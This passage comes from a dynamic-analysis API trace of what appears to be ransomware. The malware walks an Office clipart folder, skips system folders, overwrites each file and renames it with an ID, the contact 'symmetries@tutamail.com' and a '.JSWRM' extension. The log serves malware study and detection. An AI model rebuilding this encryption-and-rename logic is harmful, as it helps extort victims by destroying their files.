nFileSizeLow=0x2b38, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0309920.WMF", cAlternateFileName="")) returned 1 [0089.359] lstrcmpiW (lpString1="J0309920.WMF", lpString2=".") returned 1 [0089.359] lstrcmpiW (lpString1="J0309920.WMF", lpString2="..") returned 1 [0089.359] lstrcmpiW (lpString1="J0309920.WMF", lpString2="...") returned 1 [0089.359] lstrcmpiW (lpString1="J0309920.WMF", lpString2="windows") returned -1 [0089.359] lstrcmpiW (lpString1="J0309920.WMF", lpString2="recovery") returned -1 [0089.359] lstrcmpiW (lpString1="J0309920.WMF", lpString2="perflogs") returned -1 [0089.359] lstrcmpiW (lpString1="J0309920.WMF", lpString2="documents and settings") returned 1 [0089.359] lstrcmpiW (lpString1="J0309920.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.359] lstrcmpiW (lpString1="J0309920.WMF", lpString2="system volume information") returned -1 [0089.359] lstrcmpiW (lpString1="J0309920.WMF", lpString2="msocache") returned -1 [0089.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0089.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309920.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309920.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309920.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0089.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0089.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309920.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309920.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309920.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0089.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0089.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309920.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.360] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11064) returned 1 [0089.360] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b30) returned 0x24d210 [0089.360] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2b30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2b30, lpOverlapped=0x0) returned 1 [0089.362] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.362] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2b30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2b30, lpOverlapped=0x0) returned 1 [0089.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.362] CloseHandle (hObject=0x314) returned 1 [0089.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0089.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0089.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0089.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0089.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0089.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0089.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.363] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309920.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309920.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0089.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0089.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0089.363] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x911a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0313896.JPG", cAlternateFileName="")) returned 1 [0089.363] lstrcmpiW (lpString1="J0313896.JPG", lpString2=".") returned 1 [0089.364] lstrcmpiW (lpString1="J0313896.JPG", lpString2="..") returned 1 [0089.364] lstrcmpiW (lpString1="J0313896.JPG", lpString2="...") returned 1 [0089.364] lstrcmpiW (lpString1="J0313896.JPG", lpString2="windows") returned -1 [0089.364] lstrcmpiW (lpString1="J0313896.JPG", lpString2="recovery") returned -1 [0089.364] lstrcmpiW (lpString1="J0313896.JPG", lpString2="perflogs") returned -1 [0089.364] lstrcmpiW (lpString1="J0313896.JPG", lpString2="documents and settings") returned 1 [0089.364] lstrcmpiW (lpString1="J0313896.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.364] lstrcmpiW (lpString1="J0313896.JPG", lpString2="system volume information") returned -1 [0089.364] lstrcmpiW (lpString1="J0313896.JPG", lpString2="msocache") returned -1 [0089.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0089.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313896.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313896.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0313896.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0089.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313896.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313896.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0313896.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0089.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0089.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313896.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.365] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37146) returned 1 [0089.365] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9110) returned 0x24d210 [0089.365] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9110, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9110, lpOverlapped=0x0) returned 1 [0089.369] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.369] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9110, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9110, lpOverlapped=0x0) returned 1 [0089.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.370] CloseHandle (hObject=0x314) returned 1 [0089.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0089.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0089.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0089.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0089.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0089.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.371] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313896.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313896.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0089.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0089.372] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa75a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0313965.JPG", cAlternateFileName="")) returned 1 [0089.372] lstrcmpiW (lpString1="J0313965.JPG", lpString2=".") returned 1 [0089.372] lstrcmpiW (lpString1="J0313965.JPG", lpString2="..") returned 1 [0089.372] lstrcmpiW (lpString1="J0313965.JPG", lpString2="...") returned 1 [0089.372] lstrcmpiW (lpString1="J0313965.JPG", lpString2="windows") returned -1 [0089.372] lstrcmpiW (lpString1="J0313965.JPG", lpString2="recovery") returned -1 [0089.372] lstrcmpiW (lpString1="J0313965.JPG", lpString2="perflogs") returned -1 [0089.372] lstrcmpiW (lpString1="J0313965.JPG", lpString2="documents and settings") returned 1 [0089.372] lstrcmpiW (lpString1="J0313965.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.372] lstrcmpiW (lpString1="J0313965.JPG", lpString2="system volume information") returned -1 [0089.372] lstrcmpiW (lpString1="J0313965.JPG", lpString2="msocache") returned -1 [0089.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0089.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313965.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313965.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0313965.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0089.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0089.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313965.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313965.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0313965.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0089.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0089.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313965.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.373] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42842) returned 1 [0089.373] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa750) returned 0x24d210 [0089.373] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa750, lpOverlapped=0x0) returned 1 [0089.382] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.382] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa750, lpOverlapped=0x0) returned 1 [0089.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.383] CloseHandle (hObject=0x314) returned 1 [0089.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0089.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0089.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0089.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0089.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0089.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.384] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313965.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313965.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0089.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.384] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x81ab, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0313970.JPG", cAlternateFileName="")) returned 1 [0089.385] lstrcmpiW (lpString1="J0313970.JPG", lpString2=".") returned 1 [0089.385] lstrcmpiW (lpString1="J0313970.JPG", lpString2="..") returned 1 [0089.385] lstrcmpiW (lpString1="J0313970.JPG", lpString2="...") returned 1 [0089.385] lstrcmpiW (lpString1="J0313970.JPG", lpString2="windows") returned -1 [0089.385] lstrcmpiW (lpString1="J0313970.JPG", lpString2="recovery") returned -1 [0089.385] lstrcmpiW (lpString1="J0313970.JPG", lpString2="perflogs") returned -1 [0089.385] lstrcmpiW (lpString1="J0313970.JPG", lpString2="documents and settings") returned 1 [0089.385] lstrcmpiW (lpString1="J0313970.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.385] lstrcmpiW (lpString1="J0313970.JPG", lpString2="system volume information") returned -1 [0089.385] lstrcmpiW (lpString1="J0313970.JPG", lpString2="msocache") returned -1 [0089.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313970.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313970.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0313970.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313970.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0313970.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 